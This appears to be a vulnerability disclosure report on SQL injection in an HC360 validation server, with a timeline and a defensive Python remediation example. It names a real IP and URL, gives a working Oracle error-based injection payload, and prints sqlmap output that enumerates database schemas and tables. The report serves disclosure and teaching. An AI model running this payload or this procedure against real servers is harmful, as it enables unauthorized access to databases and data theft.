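2013-12-20: Details reported to the vendor; awaiting vendor handling
2013-12-20: Vendor confirmed; details disclosed to the vendor only
2013-12-30: Details disclosed to core white hats and experts in related fields
2014-01-09: Details disclosed to regular white hats
2014-01-19: Details disclosed to intern white hats
2014-02-03: Details disclosed to the public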
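HC360 (慧聪网) # SQL injection in a client validation program on the same C-class subnet
#1: Scanned the C-class range (/24) of sso.hc360.com [IP address: 118.194.34.37]. Target server: http://118.194.34.35/ is a server that validates data submitted by clients.
Opening an arbitrary page and appending a ' to the parameter shows that it is injectable.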
http://118.194.34.35/validate/over.asp?type=d&providerid=018000005652'
#1: Proof of vulnerability
Place: GET
Parameter: providerid
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: type=u&providerid=023000043141' AND 8116=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(118)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8116=8116) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL) AND 'ttxs'='ttxs
---
[16:25:35] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Oracle
[16:25:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[16:25:35] [INFO] fetching database (schema) names
[16:25:35] [INFO] the SQL query used returns 18 entries
[16:25:36] [INFO] retrieved: ALARMDB
[16:25:36] [INFO] retrieved: BUSIN
[16:25:36] [INFO] retrieved: CTXSYS
[16:25:36] [INFO] retrieved: DBSNMP
[16:25:37] [INFO] retrieved: DMSYS
[16:25:37] [INFO] retrieved: EXFSYS
[16:25:37] [INFO] retrieved: HUDONG
[16:25:37] [INFO] retrieved: MDSYS
[16:25:37] [INFO] retrieved: OLAPSYS
[16:25:38] [INFO] retrieved: ORDSYS
[16:25:38] [INFO] retrieved: OUTLN
[16:25:38] [INFO] retrieved: SCOTT
[16:25:38] [INFO] retrieved: SYS
[16:25:38] [INFO] retrieved: SYSMAN
[16:25:39] [INFO] retrieved: SYSTEM
[16:25:39] [INFO] retrieved: TSMSYS
[16:25:39] [INFO] retrieved: WMSYS
[16:25:39] [INFO] retrieved: XDB
available databases [18]:
[*] ALARMDB
[*] BUSIN
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HUDONG
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[16:25:39] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 40 times
[16:25:39] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\118.194.34.35'
Database: DBSNMP
[21 tables]
+---------------------------+
| MGMT_BASELINE             |
| MGMT_BASELINE_SQL         |
| MGMT_BSLN_BASELINES       |
| MGMT_BSLN_DATASOURCES     |
| MGMT_BSLN_INTERVALS       |
| MGMT_BSLN_METRICS         |
| MGMT_BSLN_RAWDATA         |
| MGMT_BSLN_STATISTICS      |
| MGMT_BSLN_THRESHOLD_PARMS |
| MGMT_CAPTURE              |
| MGMT_CAPTURE_SQL          |
| MGMT_DB_FILE_GTT          |
| MGMT_DB_SIZE_GTT          |
| MGMT_HISTORY              |
| MGMT_HISTORY_SQL          |
| MGMT_LATEST               |
| MGMT_LATEST_SQL           |
| MGMT_RESPONSE_CONFIG      |
| MGMT_SNAPSHOT             |
| MGMT_SNAPSHOT_SQL         |
| MGMT_TEMPT_SQL            |
+---------------------------+
The privileges are very high, and quite a lot of data is involved.
Filter input; restrict access by IP.
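The "filter" part of the fix, as an added example that is not part of the original report: allowlist validation plus a bind variable for the type and providerid parameters, shown beside the concatenated form. The handler functions, table schema and 12-digit ID format are assumptions, and Python's sqlite3 stands in for the ASP/Oracle stack.

```python
import re
import sqlite3

ALLOWED_TYPES = {"d", "u"}                # the two type values seen in the report
PROVIDERID_RE = re.compile(r"[0-9]{12}")  # assumed format: 12 digits, as in the report's URLs

def make_db():
    # Constructed sample data; the real table and column names are unknown.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE provider (providerid TEXT PRIMARY KEY, status TEXT)")
    db.executemany("INSERT INTO provider VALUES (?, ?)",
                   [("018000005652", "valid"), ("023000043141", "expired")])
    return db

def lookup_vulnerable(db, providerid):
    # Assumed 'before' pattern: the parameter is concatenated into the SQL text,
    # so a quote in providerid changes the statement itself.
    sql = "SELECT status FROM provider WHERE providerid = '" + providerid + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, type_, providerid):
    # 1. Allowlist validation: reject anything outside the expected values.
    if type_ not in ALLOWED_TYPES or not PROVIDERID_RE.fullmatch(providerid):
        return 400, "invalid request"
    try:
        # 2. Bind variable: the value is sent separately from the SQL text.
        row = db.execute("SELECT status FROM provider WHERE providerid = ?",
                         (providerid,)).fetchone()
    except sqlite3.Error:
        # 3. Generic error body: error-based extraction needs DBMS error text.
        return 500, "internal error"
    return (200, row[0]) if row else (404, "not found")

def demo():
    db = make_db()
    probe = "018000005652'"  # the single-quote probe from the report
    try:
        lookup_vulnerable(db, probe)
        before = "query ran"
    except sqlite3.Error:
        before = "quote reached the SQL parser"
    return before, lookup_hardened(db, "d", probe), lookup_hardened(db, "d", "018000005652")

if __name__ == "__main__":
    print(demo())
```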
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2013-12-20 18:27
Thanks
None yet